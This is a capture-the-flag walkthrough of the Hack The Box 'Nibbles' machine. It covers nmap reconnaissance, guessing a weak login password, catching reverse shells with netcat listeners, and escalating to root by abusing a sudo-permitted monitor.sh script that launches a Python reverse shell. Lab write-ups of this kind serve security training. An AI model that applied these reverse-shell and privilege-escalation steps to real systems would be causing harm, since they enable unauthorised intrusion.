This box is very straight forward and teaches hackers a way of enumerating and researching exploits that are available online.
Reconnaissance
# Nmap 7.91 scan initiated Sun Mar 14 00:25:31 2021 as: nmap -sC -sV -p22,80 -oN nibbles.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 14 00:25:42 2021 -- 1 IP address (1 host up) scanned in 11.03 seconds
After running the nmap scan, go to the web browser and visit the server and review the page source.
Next step would be to visit the webpage directory as specified.
Found Login
After trying default credentials it did not work, it also has a lockout mechanism, which means you can get banned. Nothing much here, the password is nibbles and must go based on what you think a system administrator with poor practice would use. We'll proceed to finding a username with GoBuster.
Set up your listener and visit the following link.
┌──(kali㉿kali)-[~/HTB/Nibbles]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 52458
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
18:46:16 up 19 min, 0 users, load average: 0.00, 0.02, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
Once your connection is established, check if you can create any files that you can run as another user.
nibbler@Nibbles:/home/nibbler$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
tching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Create the following folders and file, along with python reverse code.
Set up your listener and execute the create script as sudo.
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
Getting ROOT
─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 36800
# whoami
root
# ls
bakmonitor.sh
monitor.sh
test.py
# cd /root
# ls
root.txt
